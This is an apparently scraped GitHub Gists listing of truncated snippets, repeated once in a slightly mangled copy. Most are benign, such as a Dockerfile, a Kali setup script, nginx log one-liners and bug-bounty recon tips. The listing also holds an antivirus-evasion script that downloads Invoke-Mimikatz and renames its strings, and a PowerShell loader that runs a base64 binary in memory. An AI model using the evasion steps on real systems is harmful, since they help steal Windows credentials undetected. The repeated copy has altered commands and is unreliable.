3boll jmingov

## Dockerfile
FROM alpine:latest as builder
LABEL maintainer="@singe at SensePost <research@sensepost.com>"

RUN apk update && apk --no-cache add \
    build-base \
  && rm -rf /var/cache/apk/*
WORKDIR /
COPY yellow.c canary32.c canary32.h /
RUN gcc -o yellow yellow.c canary32.c

## set-up-nethunter
#!/bin/bash
# author: jmmmbnnn

# https://www.kali.org/news/kali-linux-2018-1-release/
# Note that if you haven’t updated your Kali installation in some time (tsk2), you will like receive a GPG error about the repository key being expired (ED444FF07D8D0BF6). Fortunately, this issue is quickly resolved by running the following as root:
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add

# Update and upgrade
apt update -y
apt upgrade

## LoadInMemoryModule.ps1
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA

## github_bugbountyhunting.md

      
              1 file
            
          
              98 forks
            
          
              15 comments
            
          
              532 stars
            
          
                EdOverflow
                / github_bugbountyhunting.md
            
            
              Last active
              April 29, 2024 14:36
            
              
                My tips for finding security issues in GitHub projects.
              
          
    GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output

  
## invoke_evasion.sh
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555

# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1

## web server log analysis cheat sheet
# get total requests by status code
awk '{print $9}' /var/log/nginx/access.log | sort | uniq -c | sort -rn

# get top requesters by IP
awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head | awk -v OFS='\t' '{"host " $2 | getline ip; print $0, ip}'

# get top requesters by user agent
awk -F'"' '{print $6}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head

# get top requests by URL

## zynsecrets.c
/*
Calculate Bootbase/bootext secret for debug commands
Zyxel, Huawei, ZTE, etc.

Usage:
$ gcc zynsecrets.c -o zynsecrets
$ ./zynsecrets 000102030403

Copyright (C) Kost, https://gist.github.com/kost

## clean-up-unused-github-rpositories.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              3 stars
            
          
                ntamvl
                / clean-up-unused-github-rpositories.md
            
            
              Last active
              February 21, 2024 11:14
            
              
                Clean Up Unused GitHub Repositories! Delete all unused repositories and forgotten forks in 6 (semi)-automatic steps!
              
          
    Clean Up Unused GitHub Repositories!


Delete all unused repositories and forgotten forks in 6 (semi)-automatic steps!

Ugh. Github forces me to type my password for every fork and repository I want to delete.
That’s smart and all, but what if one wants to mass-delete a bunch of old, unused, forgotten, dirty little repositories that make his repository list look like a mess? well, that person follows this short guide:
[1.] Open in a new tab all to-be-deleted github repositores (Use the mouse’s middle click)
https://github.com/wildeyes?tab=repositories


## load_dotenv.sh
if [ ! -f .env ]
then
  export $(cat .env | xargs)
fi

## linux.sh
#!/boot/bzImage

# Linux kernel userspace initialization code, translated to bash
# (Minus floppy disk handling, because seriously, it's 2017.)
# Not 100% accurate, but gives you a good idea of how kernel init works
# GPLv2, Copyright 2017 Hector Martin <marcan@marcan.st>
# Based on Linux 4.10-rc2.

# Note: pretend chroot is a builtin and affects the current process
# Note: kernel actually uses major/minor device numbers instead of device name
	FROM alpine:latest as builder
	LABEL maintainer="@singe at SensePost <research@sensepost.com>"

	RUN apk update && apk --no-cache add \
	build-base \
	&& rm -rf /var/cache/apk/*
	WORKDIR /
	COPY yellow.c canary32.c canary32.h /
	RUN gcc -o yellow yellow.c canary32.c
	#!/bin/bash
	# author: jmmmbnnn

	# https://www.kali.org/news/kali-linux-2018-1-release/
	# Note that if you haven’t updated your Kali installation in some time (tsk2), you will like receive a GPG error about the repository key being expired (ED444FF07D8D0BF6). Fortunately, this issue is quickly resolved by running the following as root:
	wget -q -O - https://archive.kali.org/archive-key.asc \| apt-key add

	# Update and upgrade
	apt update -y
	apt upgrade
	$Domain = [AppDomain]::CurrentDomain
	$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
	$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
	$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
	# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
	$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
	$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
	$TypeBuilder.CreateType()
	$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA
	# AV Bypass to run Mimikatz
	# From: https://www.blackhillsinfosec.com/?p=5555

	# Server side:
	wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
	sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
	sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
	sed -i -e 's/^[[:space:]]#.$//g' Invoke-Mimikatz.ps1
	sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
	sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
	# get total requests by status code
	awk '{print $9}' /var/log/nginx/access.log \| sort \| uniq -c \| sort -rn

	# get top requesters by IP
	awk '{print $1}' /var/log/nginx/access.log \| sort \| uniq -c \| sort -rn \| head \| awk -v OFS='\t' '{"host " $2 \| getline ip; print $0, ip}'

	# get top requesters by user agent
	awk -F'"' '{print $6}' /var/log/nginx/access.log \| sort \| uniq -c \| sort -rn \| head

	# get top requests by URL
	/*
	Calculate Bootbase/bootext secret for debug commands
	Zyxel, Huawei, ZTE, etc.

	Usage:
	$ gcc zynsecrets.c -o zynsecrets
	$ ./zynsecrets 000102030403

	Copyright (C) Kost, https://gist.github.com/kost
	#!/boot/bzImage

	# Linux kernel userspace initialization code, translated to bash
	# (Minus floppy disk handling, because seriously, it's 2017.)
	# Not 100% accurate, but gives you a good idea of how kernel init works
	# GPLv2, Copyright 2017 Hector Martin <marcan@marcan.st>
	# Based on Linux 4.10-rc2.

	# Note: pretend chroot is a builtin and affects the current process
	# Note: kernel actually uses major/minor device numbers instead of device name